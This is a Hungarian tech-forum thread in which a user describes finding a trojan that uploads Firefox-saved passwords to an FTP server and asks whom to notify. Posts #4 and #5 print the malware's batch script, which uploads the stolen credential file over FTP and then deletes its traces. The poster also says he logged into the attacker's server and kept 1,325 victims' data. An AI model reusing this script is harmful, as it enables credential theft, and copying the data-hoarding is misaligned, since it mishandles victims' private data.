Ugrás a tartalomhoz


Felhasználó adatokat ftp-re küldi a vírus.


8 válasz érkezett a témában

#1 jancsi72

    Ismerős

  • Tagok
  • PipaPipa
  • 31 Hozzászólás:

Elküldve: 2009. November 13. 16:06 PM

Sziasztok!

Az történt hogy be kaptam egy trójai vírust. Még idejében meg találtam, mielőtt tehette volna a dolgát. :) A nevét nem tudom, ne kérdezzétek. Azt csinálta volna, hogy a Firefoxban tárolt webcímeket és a hozzá tartozó felhasználóneveket és jelszavakat egy txt fájlba másolja, és elküldi egy ftp-re. Meg is van az ftp címe és belépési adatai. Be is léptem, és megtaláltam 1325 megfertőzött gép adatait, és a felhasználók adatait. Le mentettem őket a merevlemezemre, majd az ftp-ről töröltem. :?: De már vannak új megfertőzött gépek. Szerintetek mit kellene tenni, vagy kinek kellene ez ügyben intézkedni?

#2 Bajgunar

    Ismerős

  • Tagok
  • PipaPipa
  • 32 Hozzászólás:

Elküldve: 2009. November 13. 18:16 PM

Háát én ezért nem használok semmi automatikus űrlap kitöltő izét!
Semmi pass, stb nincs leírva sehova se a gépen.
Ami meg be van írva, az is kapcsolódik a bill-hez. Hozzá van rendelve egy gombhoz.
Na most nemtudom, ez mennyire biztonságosabb az ilyen billentyü leütés figyelő trójai ellen, mert nemtom, hogy akkor most ez is azt jelenti, hogy bepötyögöm a pass-t, vagy csak annyit log-ol, hogy PL G6. Aból meg fejtse vissza. Aztán meg alapból nem engedélyezek semmit se, hogy automatikusan belépjen oldalakon. Meg maxthon-t használok, sztem ez a legstabilabb, biztonságosabb. Benyomva win7 tüzfal, meg Eset SS 4.0. És mindent ellenőriz, amit letöltök. Letöltések nem nyitódnak meg, indulnak el automatikusan. Csak a vírusellenőrzés. Gyakran futtatok ccleanert, meg Advanced system Care-t.
Maxthonba meg miden előugró ablak, add-on ok, automatikus letöltés, reklámok, stb minden tiltva van. És a nod is max-ra van állítva, totális figyeléssel.
Nemtudom kinek kéne szólni ez esetben, de sztem csak úgy kezdj bele, ha eredeti progijaid vannak. Nehogy aztán a végén téged is ellenőrizzen az asva, meg megjelenjenek a rendőrök házkutatási parancsal, azt elvigyék a géped. :)
Érdekes, hogy meg tudtad találni az ftp-t, meg fel is tudtál rá csatlakozni, aztán meg törölni is tudtad a fenntlévő adatokat. De a trójait meg be tudtad kapni :?:
Asus M3N-HT Deluxe HDMI, AMD X4 Phenom 9950 BE, 4*1Gb Geil BD DDR2 1066MHz, XFX GTS250 1GB CORE E, 2*750Gb Samsung Sata2, Thermaltake Soprano FX, Logitech G15 & G9, Roccat Kave 5.1, Samsung XL2370

#3 Black Bird

    MSW Fan

  • Tagok
  • PipaPipaPipaPipaPipaPipaPipaPipaPipaPipa
  • 486 Hozzászólás:

Elküldve: 2009. November 13. 18:21 PM

Dátum: jancsi72

Sziasztok!

Az történt hogy be kaptam egy trójai vírust. Még idejében meg találtam, mielőtt tehette volna a dolgát. :) A nevét nem tudom, ne kérdezzétek. Azt csinálta volna, hogy a Firefoxban tárolt webcímeket és a hozzá tartozó felhasználóneveket és jelszavakat egy txt fájlba másolja, és elküldi egy ftp-re. Meg is van az ftp címe és belépési adatai. Be is léptem, és megtaláltam 1325 megfertőzött gép adatait, és a felhasználók adatait. Le mentettem őket a merevlemezemre, majd az ftp-ről töröltem. :?: De már vannak új megfertőzött gépek. Szerintetek mit kellene tenni, vagy kinek kellene ez ügyben intézkedni?

ha a trójai nevét leírnád akkor mi is tudnánk hogy mi ellen kéne védekezni a trójaiak meg nem vírusok.:D ha tudod hogy ki az illető ip alapján a net szolgáltatót illetve atárhely szólgáltatót kellene értesíteni először.:D
Konfigom: cpu:Amd athlon2 p360(2.3GHz) ram: 4GB DDR3 vga: Ati Radeon HD 6470M 512MB(dedicated) OS:Ubuntu Studio 11.04
Mottó: Tedd vagy ne tedd de ne próbáldd! Yoda mester , Real time kernel is back! :)

#4 jancsi72

    Ismerős

  • Tagok
  • PipaPipa
  • 31 Hozzászólás:

Elküldve: 2009. November 13. 18:55 PM

A gépemen Program Files, Users mappa kivételével minden mappa és fájl rejtett. A c partíción megjelent egy fájl tmp kiterjesztéssel, néhány Kb. volt. Az ilyesmi eleve gyanús. Megnyitottam Jegyzettömbbel, és abban volt az ftp cím, a felhasználónév és a jelszó is, és egy elérési út egy fájlhoz, ami tartalmazta az adataimat. A Windows 7 tűzfala, kimenő engedélyt kért az ftp.exe számára, amit természetesen megtagadtam, innentől nem volt nehéz összerakni a helyzetet.
Igazából nem zavar, mert az én adataim nem kerültek ki.
Ha meg engem vesznek elő meg pláne. :?:
Amúgy magyar felhasználóról, vagy arra utaló nyomokat nem találtam. De ez az eset mindenképpen figyelmet érdemel!

Ez volt a fájlban. A csillagokat én tettem bele.

del INET.LOG
echo open **********.com>>c:$.tmp
echo user tomsaw270>>c:$.tmp
echo 1231234>>c:$.tmp
echo cd /*******>>c:$.tmp
echo put "%UserProfile%%COMPUTERNAME%_FireFox.txt">>c:$.tmp
echo quit >>c:$.tmp
ftp -n -s:c:$.tmp
del c:$.tmp
del "%UserProfile%%COMPUTERNAME%_FireFox.txt"

#5 Black Bird

    MSW Fan

  • Tagok
  • PipaPipaPipaPipaPipaPipaPipaPipaPipaPipa
  • 486 Hozzászólás:

Elküldve: 2009. November 13. 19:30 PM

Dátum: jancsi72

A gépemen Program Files, Users mappa kivételével minden mappa és fájl rejtett. A c partíción megjelent egy fájl tmp kiterjesztéssel, néhány Kb. volt. Az ilyesmi eleve gyanús. Megnyitottam Jegyzettömbbel, és abban volt az ftp cím, a felhasználónév és a jelszó is, és egy elérési út egy fájlhoz, ami tartalmazta az adataimat. A Windows 7 tűzfala, kimenő engedélyt kért az ftp.exe számára, amit természetesen megtagadtam, innentől nem volt nehéz összerakni a helyzetet.
Igazából nem zavar, mert az én adataim nem kerültek ki.
Ha meg engem vesznek elő meg pláne. :?:
Amúgy magyar felhasználóról, vagy arra utaló nyomokat nem találtam. De ez az eset mindenképpen figyelmet érdemel!

Ez volt a fájlban. A csillagokat én tettem bele.

del INET.LOG
echo open **********.com>>c:$.tmp
echo user tomsaw270>>c:$.tmp
echo 1231234>>c:$.tmp
echo cd /*******>>c:$.tmp
echo put "%UserProfile%%COMPUTERNAME%_FireFox.txt">>c:$.tmp
echo quit >>c:$.tmp
ftp -n -s:c:$.tmp
del c:$.tmp
del "%UserProfile%%COMPUTERNAME%_FireFox.txt"

hm egyszerú bach scriptnek tűnik. nagy valószinüleg meg az is. :) a fenti parancsfájl kiterjesztése mire végződik?
Konfigom: cpu:Amd athlon2 p360(2.3GHz) ram: 4GB DDR3 vga: Ati Radeon HD 6470M 512MB(dedicated) OS:Ubuntu Studio 11.04
Mottó: Tedd vagy ne tedd de ne próbáldd! Yoda mester , Real time kernel is back! :)

#6 Engelhardt

    Ismerős

  • Tagok
  • PipaPipa
  • 38 Hozzászólás:

Elküldve: 2010. February 08. 15:18 PM

Dátum: Bajgunar

Háát én ezért nem használok semmi automatikus űrlap kitöltő izét!
Semmi pass, stb nincs leírva sehova se a gépen.
Ami meg be van írva, az is kapcsolódik a bill-hez. Hozzá van rendelve egy gombhoz.
Na most nemtudom, ez mennyire biztonságosabb az ilyen billentyü leütés figyelő trójai ellen, mert nemtom, hogy akkor most ez is azt jelenti, hogy bepötyögöm a pass-t, vagy csak annyit log-ol, hogy PL G6. Aból meg fejtse vissza. Aztán meg alapból nem engedélyezek semmit se, hogy automatikusan belépjen oldalakon. Meg maxthon-t használok, sztem ez a legstabilabb, biztonságosabb. Benyomva win7 tüzfal, meg Eset SS 4.0. És mindent ellenőriz, amit letöltök. Letöltések nem nyitódnak meg, indulnak el automatikusan. Csak a vírusellenőrzés. Gyakran futtatok ccleanert, meg Advanced system Care-t.
Maxthonba meg miden előugró ablak, add-on ok, automatikus letöltés, reklámok, stb minden tiltva van. És a nod is max-ra van állítva, totális figyeléssel.
Nemtudom kinek kéne szólni ez esetben, de sztem csak úgy kezdj bele, ha eredeti progijaid vannak. Nehogy aztán a végén téged is ellenőrizzen az asva, meg megjelenjenek a rendőrök házkutatási parancsal, azt elvigyék a géped. :shock:
Érdekes, hogy meg tudtad találni az ftp-t, meg fel is tudtál rá csatlakozni, aztán meg törölni is tudtad a fenntlévő adatokat. De a trójait meg be tudtad kapni :mrgreen:

ez már kicsit paranoiás :roll:
egy kis tapasztalattal korán sem kell ennyi kényelmi funkcióról lemondani :idea:

#7 wix

    Újonc

  • Tagok
  • Pipa
  • 17 Hozzászólás:

Elküldve: 2010. February 08. 17:06 PM

Hááát, nem tudom. Nekem gyanús a történet.

Ha valaki olyan trójait tud írni, hogy észrevétlenül feltud menni a gépre, az elrejti a kapcsolódási paramétereket. Tehát nem fogod tudni egyszerűen megnézni sem azt hogy hova küldi az adatokat, sem a logint és sem a jelszót.
Aki ennyire amatör, hogy ilyen egyszerűen engedi magát visszakövetni, az arra is amatör, hogy észrevétlenül a gépedre jusson.

Tehát vagy nem kerek a történet, vagy nem neten keresztül került a gépre az okosság. Nem lehet, hogy valaki közvetlenül fért hozzá a géphez és egyszerűen feltette rá a "kis rosszindulatút"?

Ja és ha biztos vagy benne, hogy ez egy rosszindulatú kód ami a neten keresztül mászott be a gépre miért nem árulod el a pontos paramétereket, hogy mások is ellenőrízhessék? Ha tudjuk az ftp címet, akkor meg van a szerver és lenyomozható több lényeges adat is.
kép

#8 Black Bird

    MSW Fan

  • Tagok
  • PipaPipaPipaPipaPipaPipaPipaPipaPipaPipa
  • 486 Hozzászólás:

Elküldve: 2010. February 08. 18:53 PM

Dátum: wix

Hááát, nem tudom. Nekem gyanús a történet.

Ha valaki olyan trójait tud írni, hogy észrevétlenül feltud menni a gépre, az elrejti a kapcsolódási paramétereket. Tehát nem fogod tudni egyszerűen megnézni sem azt hogy hova küldi az adatokat, sem a logint és sem a jelszót.
Aki ennyire amatör, hogy ilyen egyszerűen engedi magát visszakövetni, az arra is amatör, hogy észrevétlenül a gépedre jusson.

Tehát vagy nem kerek a történet, vagy nem neten keresztül került a gépre az okosság. Nem lehet, hogy valaki közvetlenül fért hozzá a géphez és egyszerűen feltette rá a "kis rosszindulatút"?

Ja és ha biztos vagy benne, hogy ez egy rosszindulatú kód ami a neten keresztül mászott be a gépre miért nem árulod el a pontos paramétereket, hogy mások is ellenőrízhessék? Ha tudjuk az ftp címet, akkor meg van a szerver és lenyomozható több lényeges adat is.

ja ja azt jó lenne tudni a fenti adatok mik a csillagos részben csak hogy biztosak legyünk benne. mert így nagyon gyanús firefoxot meg max kiterjesztésen keresztül lehet neten keresztül fertőzni vagy a felhasználói profil kiolvasásával amihez meg ugye manuálisan vgy netről kéne bejőnnie a másik ami furcsa az az hogy nem írt róla hogy milyen virusírtót meg tűzfalat használ. valahogy nem tűnik hitelesnek a történet.
Konfigom: cpu:Amd athlon2 p360(2.3GHz) ram: 4GB DDR3 vga: Ati Radeon HD 6470M 512MB(dedicated) OS:Ubuntu Studio 11.04
Mottó: Tedd vagy ne tedd de ne próbáldd! Yoda mester , Real time kernel is back! :)

#9 Engelhardt

    Ismerős

  • Tagok
  • PipaPipa
  • 38 Hozzászólás:

Elküldve: 2010. February 08. 20:48 PM

wix, ja igazad van! ez így nagyon egyszerű lenne :shock:
meg jó lenne tudni hogy milyen védelem volt azon a gépen, vagy egyáltalán volt e! :mrgreen:





1 felhasználó olvassa ezt a témát.

0 felhasználó, 1 vendég, 0 anonim felhasználó